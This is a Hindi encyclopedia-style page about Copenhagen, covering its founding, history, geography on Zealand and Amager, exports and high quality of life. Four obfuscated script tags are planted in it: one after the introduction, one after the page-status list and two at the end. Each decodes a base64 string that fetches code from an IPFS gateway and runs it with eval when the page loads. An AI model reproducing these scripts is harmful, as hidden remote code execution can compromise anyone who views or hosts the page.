कोपनहेगन

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

कोपनहेगन (अंग्रेज़ी: Copenhagen) डेनमार्क की राजधानी और वहाँ का सबसे बड़ा नगर है। यह जीलण्ड और अमागर नामक द्वीपों पर बसा हुआ है। कोपनहेगन को बारम्बार एक ऐसे नगर के रूप में पहचान मिली है, जहाँ का जीवन स्तर विश्व में सर्वश्रेष्ठ माना जाता है। यह दुनिया के सबसे पर्यावरण-अनुकूल नगरों में से एक है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

इतिहास

कोपनहेगन की स्थापना 1000 ई. में स्वेन फोर्कबीयर्ड प्रथम द्वारा की गई थी। 12वीं सदी के मध्य तक यह एक मत्स्योत्पादक ग्राम था, जिसे 'ह्वान' कहा जाता था। जब यह 1167 ई. में अब्सालोन नामक बिशप के अधिकार में आया, तब इसे और अधिक महत्व प्राप्त हुआ। उत्कृष्ट बंदरगाह नगर की वृद्धि प्रबलित करने लगा और यह नगर वाणिज्य का एक महत्वपूर्ण केंद्र बन गया। इस प्रकार इसका नाम कोपनहेगन पड़ा, जिसका डैनिश भाषा में अर्थ है- "बन्दरगाह के व्यापारी"। वर्ष 1254 ई. में कोपनहेगन ने नगर का रूप उस समय धारण किया, जब राजा क्रिस्टोफर तृतीय ने इसे अपनी राजधानीं बनाया। तब से इसकी वास्तविक उन्नति हुई। 1700 ई. में डच, स्वीडन तथा अंग्रेज़ों की बमवर्षा से 1728 एवं 1795 में अग्नि से तथा 1807 में अंग्रेज़ों की पुन: बमवर्षा से यह नगर अत्यंत क्षतिग्रस्त हो गया। इसकी व्यापारिक उन्नति ने, जो 19वीं शताब्दी के मध्य में मंद पड़ गई थी, 1894 ई. में करमुक्त बंदरगाह के निर्माण से पुनर्जीवन प्राप्त किया।

इस क्षेत्र के प्रथम लिखित दस्तावेज 11वीं सदी के हैं और कोपनहेगन 15वीं सदी के आरम्भ में और क्रिस्चियन चतुर्थ के शासनकाल में डेनमार्क की राजधानी बना। वर्ष 2000 में ओरेसण्ड सेतु के पूरा होने के साथ ही कोपनहेगन ओरेसण्ड क्षेत्र का केन्द्र बन गया। इस क्षेत्र में कोपनहेगन और स्वीडन का माल्मो नगर मिलकर एक आम महानगरीय क्षेत्र बनने की प्रकिया में है।

भूगोल

कोपनहेगन जीलैण्ड द्वीप के पूर्वी तट की समतल भूमि पर स्थित है। यह पूर्वी किनारे, अमागर द्वीप पर थोड़ा सा भाग और बहुत-से छोटे-छोटे प्राकृतिक और कृत्रिम द्वीपों पर बसा हुआ है। कोपनहेगन के पूरब की ओर ओरेसण्ड नामक एक जलराशि है, जो डेनमार्क और स्वीडन को पृथक् करती है और जो उत्तरी सागर और बाल्टिक सागर को जोड़ती है। 50 कि.मी. के अर्धव्यास में 27 लाख लोगों के साथ कोपनहेगन उत्तरी यूरोप के सबसे सघन क्षेत्रों में से एक है।

निर्यातक वस्तुएँ

यहाँ एक प्राकृतिक पत्तन तथा बंदरगाह है। मुख्य निर्यात मांस, दुग्ध पदार्थ, चीनी मिट्टी, मिट्टी के समान, घड़ियाँ, मशीनें, वस्त्र रासायनिक पदार्थ, चीनी मद्य, डिजेल इंजन, जलपोत, काष्ठपदार्थ, काग़ज़ तथा चाकलेट इत्यादि हैं।

सर्वश्रेष्ठ जीवन स्तर

कोपनहेगन को बार-बार एक ऐसे नगर के रूप में पहचान मिली है, जहाँ का जीवन स्तर विश्व में सर्वश्रेष्ठ में से एक है। यह दुनिया के सबसे पर्यावरण-अनुकूल नगरों में से एक माना जाता है। भीतरी बन्दरगाह का पानी इतना साफ़ है कि उसमें तैरा जा सकता है। यहाँ के 36 प्रतिशत निवासी प्रतिदिन साइकिल से काम पर जाते हैं, यानी की प्रतिदिन 11 लाख कि.मी. की यात्रा साइकिल के माध्यम से पूर्ण की जाती है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>